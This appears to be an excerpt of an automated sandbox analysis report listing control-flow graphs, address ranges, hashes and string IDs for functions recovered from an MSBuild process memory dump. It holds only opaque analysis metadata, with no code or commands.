                                                                                                  control_flow_graph 128 6723058-6723079 129 672307b-672307e 128->129 130 6723833-6723836 129->130 131 6723084-67230a3 129->131 132 6723838-6723857 130->132 133 672385c-672385e 130->133 140 67230a5-67230a8 131->140 141 67230bc-67230c6 131->141 132->133 135 6723860 133->135 136 6723865-6723868 133->136 135->136 136->129 137 672386e-6723877 136->137 140->141 143 67230aa-67230ba 140->143 146 67230cc-67230db 141->146 143->146 256 67230dd call 6723886 146->256 257 67230dd call 6723888 146->257 147 67230e2-67230e4 148 67230f1-67233ce 147->148 149 67230e6-67230ec 147->149 170 67233d4-6723483 148->170 171 6723825-6723832 148->171 149->137 180 6723485-67234aa 170->180 181 67234ac 170->181 182 67234b5-67234c5 180->182 181->182 185 67234cb-67234ea 182->185 186 672380c-6723818 182->186 185->186 189 67234f0-67234fa 185->189 186->170 187 672381e 186->187 187->171 189->186 190 6723500-672350b 189->190 190->186 191 6723511-67235e7 190->191 203 67235f5-6723625 191->203 204 67235e9-67235eb 191->204 208 6723633-672363f 203->208 209 6723627-6723629 203->209 204->203 210 6723641-6723645 208->210 211 67236a5-67236c0 208->211 209->208 210->211 212 6723647-6723671 210->212 215 67236c6-6723702 211->215 216 67237fd-6723806 211->216 221 6723673-6723675 212->221 222 672367f-672369e 212->222 227 6723710-672371e 215->227 228 6723704-6723706 215->228 216->186 216->191 221->222 222->215 226 67236a0 222->226 226->216 230 6723720-672372b 227->230 231 6723735-6723740 227->231 228->227 230->231 236 672372d 230->236 234 6723742-6723748 231->234 235 6723758-6723769 231->235 237 672374a 234->237 238 672374c-672374e 234->238 240 6723781-672378d 235->240 241 672376b-6723771 235->241 236->231 237->235 238->235 245 67237a5-67237f6 240->245 246 672378f-6723795 240->246 242 6723773 241->242 243 6723775-6723777 241->243 242->240 243->240 245->216 247 6723797 246->247 248 6723799-672379b 246->248 247->245 248->245 256->147 257->147
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2392861976
                                                                                                  • Opcode ID: 4789d763bb5186dc1e4a97740c157f983f5c549c785abbf3ac64b54580a6f102
                                                                                                  • Instruction ID: cc1278218f7bce0f2c090c6fc8bed2cd1ecc04117b7cc3bda443f1b293a64ecf
                                                                                                  • Opcode Fuzzy Hash: 4789d763bb5186dc1e4a97740c157f983f5c549c785abbf3ac64b54580a6f102
                                                                                                  • Instruction Fuzzy Hash: 9C323231E1061A8FCB54DF79C8945ADB7B6BFC9310F108669D409AB224EF34ED86CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 799 6727d98-6727db6 800 6727db8-6727dbb 799->800 801 6727ddc-6727ddf 800->801 802 6727dbd-6727dd7 800->802 803 6727e02-6727e05 801->803 804 6727de1-6727dfd 801->804 802->801 805 6727e07-6727e15 803->805 806 6727e1c-6727e1f 803->806 804->803 815 6727e3e-6727e54 805->815 817 6727e17 805->817 809 6727e21-6727e2b 806->809 810 6727e2c-6727e2e 806->810 813 6727e30 810->813 814 6727e35-6727e38 810->814 813->814 814->800 814->815 819 6727e5a-6727e63 815->819 820 672806f-6728079 815->820 817->806 821 672807a-67280af 819->821 822 6727e69-6727e86 819->822 825 67280b1-67280b4 821->825 831 672805c-6728069 822->831 832 6727e8c-6727eb4 822->832 827 67280b6-67280d2 825->827 828 67280d7-67280da 825->828 827->828 829 67280e0-67280ec 828->829 830 6728187-672818a 828->830 836 67280f7-67280f9 829->836 833 6728190-672819f 830->833 834 67283bf-67283c1 830->834 831->819 831->820 832->831 853 6727eba-6727ec3 832->853 849 67281a1-67281bc 833->849 850 67281be-6728202 833->850 837 67283c3 834->837 838 67283c8-67283cb 834->838 841 6728111-6728115 836->841 842 67280fb-6728101 836->842 837->838 838->825 844 67283d1-67283da 838->844 847 6728123 841->847 848 6728117-6728121 841->848 845 6728103 842->845 846 6728105-6728107 842->846 845->841 846->841 852 6728128-672812a 847->852 848->852 849->850 859 6728393-67283a9 850->859 860 6728208-6728219 850->860 856 6728141-672817a 852->856 857 672812c-672812f 852->857 853->821 854 6727ec9-6727ee5 853->854 865 672804a-6728056 854->865 866 6727eeb-6727f15 854->866 856->833 879 672817c-6728186 856->879 857->844 859->834 869 672837e-672838d 860->869 870 672821f-672823c 860->870 865->831 865->853 882 6728040-6728045 866->882 883 6727f1b-6727f43 866->883 869->859 869->860 870->869 881 6728242-6728338 call 67265a0 870->881 932 6728346 881->932 933 672833a-6728344 881->933 882->865 883->882 890 6727f49-6727f77 883->890 890->882 895 6727f7d-6727f86 890->895 895->882 896 6727f8c-6727fbe 895->896 904 6727fc0-6727fc4 896->904 905 6727fc9-6727fe5 896->905 904->882 907 6727fc6 904->907 905->865 908 6727fe7-672803e call 67265a0 905->908 907->905 908->865 934 672834b-672834d 932->934 933->934 934->869 935 672834f-6728354 934->935 936 6728362 935->936 937 6728356-6728360 935->937 938 6728367-6728369 936->938 937->938 938->869 939 672836b-6728377 938->939 939->869
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q
                                                                                                  • API String ID: 0-355816377
                                                                                                  • Opcode ID: dfcabc74951bbaf4c0d02e1c6ef11800b0304ddf6aeee64087bd6db250f36400
                                                                                                  • Instruction ID: ac370410c6472d5cbec382448f89e70cd5143a40886a522e98ba5e15844cb8bc
                                                                                                  • Opcode Fuzzy Hash: dfcabc74951bbaf4c0d02e1c6ef11800b0304ddf6aeee64087bd6db250f36400
                                                                                                  • Instruction Fuzzy Hash: 2002A030B1022A9FDB54DB75D990AAEB7E2FF84304F148529D4059B395DB32EC86CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c8c0050fdf21919519382b8bb9ff2141816a1a4d99ccb8c5965c28a765b12b28
                                                                                                  • Instruction ID: 12c38e47e0984dc6945ed2b4508306389e9a79010bb252a435c091b179f3e1fb
                                                                                                  • Opcode Fuzzy Hash: c8c0050fdf21919519382b8bb9ff2141816a1a4d99ccb8c5965c28a765b12b28
                                                                                                  • Instruction Fuzzy Hash: 9E926634E002258FDB64DF68C188A6DB7F2FB44314F5484A9D859AB366DB34EE85CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8cbcc09cffc44dcd893016ba1d2ae999fba3726e286942ff8bf8afd8ce023e1
                                                                                                  • Instruction ID: b923a93105d5922062097057b38695f68080da3997d032e4359043576c5ab706
                                                                                                  • Opcode Fuzzy Hash: d8cbcc09cffc44dcd893016ba1d2ae999fba3726e286942ff8bf8afd8ce023e1
                                                                                                  • Instruction Fuzzy Hash: 1F62CF34B102269FDB54DB68D584AADB7F2FF84314F24856AE406EB394DB31EC46CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c57ccaa02767f9d2540e3ca93db1d2334da56863338aac8bfba91354897c1769
                                                                                                  • Instruction ID: 127a2278a7688f7f18681a975268544ee2cd65c94007832df4db3920c948a184
                                                                                                  • Opcode Fuzzy Hash: c57ccaa02767f9d2540e3ca93db1d2334da56863338aac8bfba91354897c1769
                                                                                                  • Instruction Fuzzy Hash: B122D035E102268FEB64DBA4C4846BEBBB2FF85314F248569D419EB384DB31DD42CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e1ecc4a98639454d9f7b29988784a5853483d9593531bdce3c854d0964342e86
                                                                                                  • Instruction ID: f31795d69a09dc9cbc129d44fd30837296bd4eed44b8dcc18cda19b462dcef99
                                                                                                  • Opcode Fuzzy Hash: e1ecc4a98639454d9f7b29988784a5853483d9593531bdce3c854d0964342e86
                                                                                                  • Instruction Fuzzy Hash: 5E229170E1022A8FDF64CB68C4807BDB7B6FB89718F248926D449DB395DB35DC818B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 672ace8-672ad06 1 672ad08-672ad0b 0->1 2 672ad25-672ad28 1->2 3 672ad0d-672ad16 1->3 6 672ad2a-672ad2e 2->6 7 672ad39-672ad3c 2->7 4 672af1f-672af30 3->4 5 672ad1c-672ad20 3->5 17 672af32-672af56 4->17 18 672afad-672afaf 4->18 5->2 8 672af14-672af1e 6->8 9 672ad34 6->9 10 672ad46-672ad49 7->10 11 672ad3e-672ad43 7->11 9->7 13 672ad4b-672ad58 10->13 14 672ad5d-672ad60 10->14 11->10 13->14 15 672ad62-672ad7e 14->15 16 672ad83-672ad86 14->16 15->16 19 672ada0-672ada3 16->19 20 672ad88-672ad9b 16->20 21 672af58-672af5b 17->21 22 672afb0-672afb3 18->22 27 672af05-672af0e 19->27 28 672ada9-672adac 19->28 20->19 25 672af68-672af6b 21->25 26 672af5d-672af67 21->26 29 672afb5-672afb7 22->29 30 672b21c-672b21e 22->30 37 672af7a-672af7d 25->37 38 672af6d call 672b240 25->38 27->3 27->8 34 672adae-672adb7 28->34 35 672adbc-672adbe 28->35 36 672afb9-672aff4 29->36 31 672b220 30->31 32 672b225-672b228 30->32 31->32 32->21 42 672b22e-672b238 32->42 34->35 43 672adc0 35->43 44 672adc5-672adc8 35->44 50 672b1e7-672b1fa 36->50 51 672affa-672b006 36->51 39 672af8a-672af8d 37->39 40 672af7f-672af83 37->40 45 672af73-672af75 38->45 39->22 47 672af8f-672afab 39->47 40->36 46 672af85 40->46 43->44 44->1 48 672adce-672adf2 44->48 45->37 46->39 47->18 61 672af02 48->61 62 672adf8-672ae07 48->62 54 672b1fc 50->54 57 672b026-672b06a 51->57 58 672b008-672b021 51->58 60 672b1fd 54->60 77 672b086-672b0c5 57->77 78 672b06c-672b07e 57->78 58->54 60->60 61->27 65 672ae09-672ae0f 62->65 66 672ae1f-672ae5a call 67265a0 62->66 68 672ae13-672ae15 65->68 69 672ae11 65->69 87 672ae72-672ae89 66->87 88 672ae5c-672ae62 66->88 68->66 69->66 83 672b0cb-672b1a6 call 67265a0 77->83 84 672b1ac-672b1c1 77->84 78->77 83->84 84->50 97 672aea1-672aeb2 87->97 98 672ae8b-672ae91 87->98 89 672ae66-672ae68 88->89 90 672ae64 88->90 89->87 90->87 103 672aeb4-672aeba 97->103 104 672aeca-672aefb 97->104 99 672ae93 98->99 100 672ae95-672ae97 98->100 99->97 100->97 106 672aebe-672aec0 103->106 107 672aebc 103->107 104->61 106->104 107->104
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-3823777903
                                                                                                  • Opcode ID: 4f9de832e0085b89d0b6e8858cb0a6cf6deeb34429c23226cc773436f037e16c
                                                                                                  • Instruction ID: 81f788c491ff531d79584b63bf587cde76e5063ff6fc3ded26e570930c4d65a8
                                                                                                  • Opcode Fuzzy Hash: 4f9de832e0085b89d0b6e8858cb0a6cf6deeb34429c23226cc773436f037e16c
                                                                                                  • Instruction Fuzzy Hash: 01E17F70E1031A8FCB69DF69D9806AEB7B2FF85304F208929D405AB359DB35DC46CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 258 672b668-672b68a 259 672b68c-672b68f 258->259 260 672b691-672b6a6 259->260 261 672b6cd-672b6d0 259->261 264 672ba02-672ba36 260->264 273 672b6ac-672b6c8 260->273 262 672b6d2-672b6d6 261->262 263 672b6f7-672b6fa 261->263 262->264 265 672b6dc-672b6ec 262->265 266 672b710-672b713 263->266 267 672b6fc-672b705 263->267 281 672ba38-672ba3b 264->281 282 672b9b2-672b9b6 265->282 283 672b6f2 265->283 271 672b715-672b719 266->271 272 672b73a-672b73d 266->272 269 672b963-672b96c 267->269 270 672b70b 267->270 269->264 274 672b972-672b979 269->274 270->266 271->264 279 672b71f-672b72f 271->279 275 672b760-672b763 272->275 276 672b73f-672b75b 272->276 273->261 280 672b97e-672b981 274->280 284 672b7c4-672b7c7 275->284 285 672b765-672b7bf call 67265a0 275->285 276->275 303 672b735 279->303 304 672b7fa-672b7fd 279->304 287 672b983-672b98c 280->287 288 672b991-672b994 280->288 290 672ba5e-672ba61 281->290 291 672ba3d-672ba59 281->291 282->264 294 672b9b8-672b9c8 282->294 283->263 292 672b7d1-672b7d4 284->292 293 672b7c9-672b7ce 284->293 285->284 287->288 296 672b996-672b99f 288->296 297 672b9ad-672b9b0 288->297 301 672ba67-672ba8f 290->301 302 672bccd-672bccf 290->302 291->290 298 672b7e1-672b7e4 292->298 299 672b7d6-672b7dc 292->299 293->292 294->271 319 672b9ce 294->319 296->264 306 672b9a1-672b9a8 296->306 297->282 307 672b9d3-672b9d6 297->307 310 672b7e6-672b7f0 298->310 311 672b7f5-672b7f8 298->311 299->298 340 672ba91-672ba94 301->340 341 672ba99-672badd 301->341 313 672bcd1 302->313 314 672bcd6-672bcd9 302->314 303->272 315 672b802-672b805 304->315 306->297 307->304 320 672b9dc-672b9df 307->320 310->311 311->304 311->315 313->314 314->281 321 672bcdf-672bce8 314->321 316 672b812-672b815 315->316 317 672b807-672b80d 315->317 323 672b822-672b825 316->323 324 672b817-672b81b 316->324 317->316 319->307 320->267 327 672b9e5-672b9e7 320->327 323->304 330 672b827-672b82a 323->330 324->317 329 672b81d 324->329 332 672b9e9 327->332 333 672b9ee-672b9f1 327->333 329->323 330->304 335 672b82c-672b82f 330->335 332->333 333->259 334 672b9f7-672ba01 333->334 337 672b831-672b835 335->337 338 672b846-672b849 335->338 337->264 342 672b83b-672b841 337->342 343 672b86b-672b86e 338->343 344 672b84b-672b866 338->344 340->321 375 672bcc2-672bccc 341->375 376 672bae3-672baec 341->376 342->338 345 672b870-672b873 343->345 346 672b8ce-672b8d7 343->346 344->343 348 672b8b2-672b8b5 345->348 349 672b875-672b88a 345->349 346->296 351 672b8dd 346->351 354 672b8b7-672b8bb 348->354 355 672b8c9-672b8cc 348->355 349->264 365 672b890-672b8ad 349->365 356 672b8e2-672b8e5 351->356 354->264 359 672b8c1-672b8c4 354->359 355->346 355->356 360 672b8f7-672b8fa 356->360 361 672b8e7 356->361 359->355 363 672b911-672b914 360->363 364 672b8fc-672b900 360->364 367 672b8ef-672b8f2 361->367 369 672b921-672b924 363->369 370 672b916-672b91c 363->370 364->264 368 672b906-672b90c 364->368 365->348 367->360 368->363 373 672b931-672b934 369->373 374 672b926-672b92c 369->374 370->369 377 672b936-672b93b 373->377 378 672b93e-672b941 373->378 374->373 379 672baf2-672bb5e call 67265a0 376->379 380 672bcb8-672bcbd 376->380 377->378 381 672b943-672b946 378->381 382 672b94b-672b94e 378->382 392 672bb64-672bb69 379->392 393 672bc58-672bc6d 379->393 380->375 381->382 384 672b950-672b959 382->384 385 672b95e-672b961 382->385 384->385 385->269 385->280 395 672bb85 392->395 396 672bb6b-672bb71 392->396 393->380 399 672bb87-672bb8d 395->399 397 672bb73-672bb75 396->397 398 672bb77-672bb79 396->398 400 672bb83 397->400 398->400 401 672bba2-672bbaf 399->401 402 672bb8f-672bb95 399->402 400->399 409 672bbb1-672bbb7 401->409 410 672bbc7-672bbd4 401->410 403 672bc43-672bc52 402->403 404 672bb9b 402->404 403->392 403->393 404->401 405 672bbd6-672bbe3 404->405 406 672bc0a-672bc17 404->406 418 672bbe5-672bbeb 405->418 419 672bbfb-672bc08 405->419 415 672bc19-672bc1f 406->415 416 672bc2f-672bc3c 406->416 411 672bbbb-672bbbd 409->411 412 672bbb9 409->412 410->403 411->410 412->410 420 672bc23-672bc25 415->420 421 672bc21 415->421 416->403 422 672bbef-672bbf1 418->422 423 672bbed 418->423 419->403 420->416 421->416 422->419 423->419
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2392861976
                                                                                                  • Opcode ID: 94d690d88f5d0636fa7b8cf0e7d93516b9a9bdb2df7187fa1c9780f6477bf299
                                                                                                  • Instruction ID: fc3c97062151b002e9918c89fa1a1f54987199456014b86ed1dcb027c08acd06
                                                                                                  • Opcode Fuzzy Hash: 94d690d88f5d0636fa7b8cf0e7d93516b9a9bdb2df7187fa1c9780f6477bf299
                                                                                                  • Instruction Fuzzy Hash: DE028030E1022A8FDF64CF68D5806ADB7B2FB84B18F14892AD449DB355DB31ED85CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 426 6729168-672918d 427 672918f-6729192 426->427 428 6729a50-6729a53 427->428 429 6729198-67291ad 427->429 430 6729a55-6729a74 428->430 431 6729a79-6729a7b 428->431 436 67291c5-67291db 429->436 437 67291af-67291b5 429->437 430->431 433 6729a82-6729a85 431->433 434 6729a7d 431->434 433->427 438 6729a8b-6729a95 433->438 434->433 443 67291e6-67291e8 436->443 439 67291b7 437->439 440 67291b9-67291bb 437->440 439->436 440->436 444 6729200-6729271 443->444 445 67291ea-67291f0 443->445 456 6729273-6729296 444->456 457 672929d-67292b9 444->457 446 67291f2 445->446 447 67291f4-67291f6 445->447 446->444 447->444 456->457 462 67292e5-6729300 457->462 463 67292bb-67292de 457->463 468 6729302-6729324 462->468 469 672932b-6729346 462->469 463->462 468->469 474 672936b-6729379 469->474 475 6729348-6729364 469->475 476 672937b-6729384 474->476 477 6729389-6729403 474->477 475->474 476->438 483 6729450-6729465 477->483 484 6729405-6729423 477->484 483->428 488 6729425-6729434 484->488 489 672943f-672944e 484->489 488->489 489->483 489->484
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: abb68b828af5ec89390429a63d4bf154afa40a9acbe56b599e93ab653b2b7e44
                                                                                                  • Instruction ID: b94f7abf21c26969014a26219a9ab928d356bf246780b9bd753e93b6bac0b036
                                                                                                  • Opcode Fuzzy Hash: abb68b828af5ec89390429a63d4bf154afa40a9acbe56b599e93ab653b2b7e44
                                                                                                  • Instruction Fuzzy Hash: 1C913F30F1022A9FDB54DB66D9507AEB7F6BFC9204F148569C509EB384EB309C868B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 492 672cf50-672cf6b 493 672cf6d-672cf70 492->493 494 672cf72-672cfb4 493->494 495 672cfb9-672cfbc 493->495 494->495 496 672cfbe-672cfda 495->496 497 672cfdf-672cfe2 495->497 496->497 498 672cfe4-672cff3 497->498 499 672d02b-672d02e 497->499 504 672d002-672d00e 498->504 505 672cff5-672cffa 498->505 501 672d030-672d032 499->501 502 672d03d-672d040 499->502 508 672d2f7-672d300 501->508 509 672d038 501->509 510 672d042-672d084 502->510 511 672d089-672d08c 502->511 506 672d014-672d026 504->506 507 672d96d-672d9a6 504->507 505->504 506->499 527 672d9a8-672d9ab 507->527 513 672d302-672d307 508->513 514 672d30f-672d31b 508->514 509->502 510->511 515 672d0d5-672d0d8 511->515 516 672d08e-672d0d0 511->516 513->514 522 672d321-672d335 514->522 523 672d42c-672d431 514->523 518 672d121-672d124 515->518 519 672d0da-672d11c 515->519 516->515 528 672d126-672d168 518->528 529 672d16d-672d170 518->529 519->518 542 672d33b-672d34d 522->542 543 672d439 522->543 523->543 534 672d9ba-672d9bd 527->534 535 672d9ad call 672dac5 527->535 528->529 536 672d172-672d1b4 529->536 537 672d1b9-672d1bc 529->537 544 672d9e0-672d9e3 534->544 545 672d9bf-672d9db 534->545 551 672d9b3-672d9b5 535->551 536->537 539 672d1c6-672d1c9 537->539 540 672d1be-672d1c3 537->540 548 672d1e6-672d1e9 539->548 549 672d1cb-672d1e1 539->549 540->539 573 672d371-672d373 542->573 574 672d34f-672d355 542->574 550 672d43c-672d448 543->550 553 672da16-672da18 544->553 554 672d9e5-672da11 544->554 545->544 559 672d232-672d235 548->559 560 672d1eb-672d22d 548->560 549->548 557 672d252-672d261 550->557 558 672d44e-672d73b 550->558 551->534 563 672da1a 553->563 564 672da1f-672da22 553->564 554->553 576 672d263-672d268 557->576 577 672d270-672d27c 557->577 705 672d962-672d96c 558->705 706 672d741-672d747 558->706 571 672d237-672d239 559->571 572 672d244-672d247 559->572 560->559 563->564 564->527 570 672da24-672da33 564->570 603 672da35-672da98 call 67265a0 570->603 604 672da9a-672daaf 570->604 571->543 583 672d23f 571->583 572->550 584 672d24d-672d250 572->584 588 672d37d-672d389 573->588 586 672d357 574->586 587 672d359-672d365 574->587 576->577 577->507 578 672d282-672d294 577->578 593 672d299-672d29c 578->593 583->572 584->557 584->593 594 672d367-672d36f 586->594 587->594 614 672d397 588->614 615 672d38b-672d395 588->615 598 672d2e5-672d2e7 593->598 599 672d29e-672d2e0 593->599 594->588 611 672d2e9 598->611 612 672d2ee-672d2f1 598->612 599->598 603->604 622 672dab0 604->622 611->612 612->493 612->508 621 672d39c-672d39e 614->621 615->621 621->543 625 672d3a4-672d3c0 call 67265a0 621->625 622->622 639 672d3c2-672d3c7 625->639 640 672d3cf-672d3db 625->640 639->640 640->523 643 672d3dd-672d42a 640->643 643->543 707 672d756-672d75f 706->707 708 672d749-672d74e 706->708 707->507 709 672d765-672d778 707->709 708->707 711 672d952-672d95c 709->711 712 672d77e-672d784 709->712 711->705 711->706 713 672d793-672d79c 712->713 714 672d786-672d78b 712->714 713->507 715 672d7a2-672d7c3 713->715 714->713 718 672d7d2-672d7db 715->718 719 672d7c5-672d7ca 715->719 718->507 720 672d7e1-672d7fe 718->720 719->718 720->711 723 672d804-672d80a 720->723 723->507 724 672d810-672d829 723->724 726 672d945-672d94c 724->726 727 672d82f-672d856 724->727 726->711 726->723 727->507 730 672d85c-672d866 727->730 730->507 731 672d86c-672d883 730->731 733 672d892-672d8ad 731->733 734 672d885-672d890 731->734 733->726 739 672d8b3-672d8cc call 67265a0 733->739 734->733 743 672d8db-672d8e4 739->743 744 672d8ce-672d8d3 739->744 743->507 745 672d8ea-672d93e 743->745 744->743 745->726
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q
                                                                                                  • API String ID: 0-831282457
                                                                                                  • Opcode ID: 39a54bb8a853734c181d5a878660132e90f91c139126c0943b4a14aeb7cb1b42
                                                                                                  • Instruction ID: cfa13d849858ee9eee31b16d77b11b33f8b98603c4cdd07b989a6aac27f1dd3c
                                                                                                  • Opcode Fuzzy Hash: 39a54bb8a853734c181d5a878660132e90f91c139126c0943b4a14aeb7cb1b42
                                                                                                  • Instruction Fuzzy Hash: 30627330A002168FCB55EF69D590A5EB7F2FF84344F208A29D0159F369DB71ED8ACB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 753 6724b78-6724b9c 754 6724b9e-6724ba1 753->754 755 6724bc2-6724bc5 754->755 756 6724ba3-6724bbd 754->756 757 67252a4-67252a6 755->757 758 6724bcb-6724cc3 755->758 756->755 760 67252a8 757->760 761 67252ad-67252b0 757->761 776 6724d46-6724d4d 758->776 777 6724cc9-6724d16 call 6725420 758->777 760->761 761->754 762 67252b6-67252c3 761->762 778 6724d53-6724dc3 776->778 779 6724dd1-6724dda 776->779 790 6724d1c-6724d38 777->790 796 6724dc5 778->796 797 6724dce 778->797 779->762 793 6724d43 790->793 794 6724d3a 790->794 793->776 794->793 796->797 797->779
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fcq$XPcq$\Ocq
                                                                                                  • API String ID: 0-3575482020
                                                                                                  • Opcode ID: 5252fc1534c07991dcb1ad9af0c97821bfa79293b216fdf33c04305d764e11a3
                                                                                                  • Instruction ID: a1c4ec90015962f6dcbe85a946ad6ae69dab8e263a0ecdcafa39b4f3630ce16c
                                                                                                  • Opcode Fuzzy Hash: 5252fc1534c07991dcb1ad9af0c97821bfa79293b216fdf33c04305d764e11a3
                                                                                                  • Instruction Fuzzy Hash: 55617F70F102199FEB549FA9C8547AEBBF7FB88300F208429D50AEB395DB758C458B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
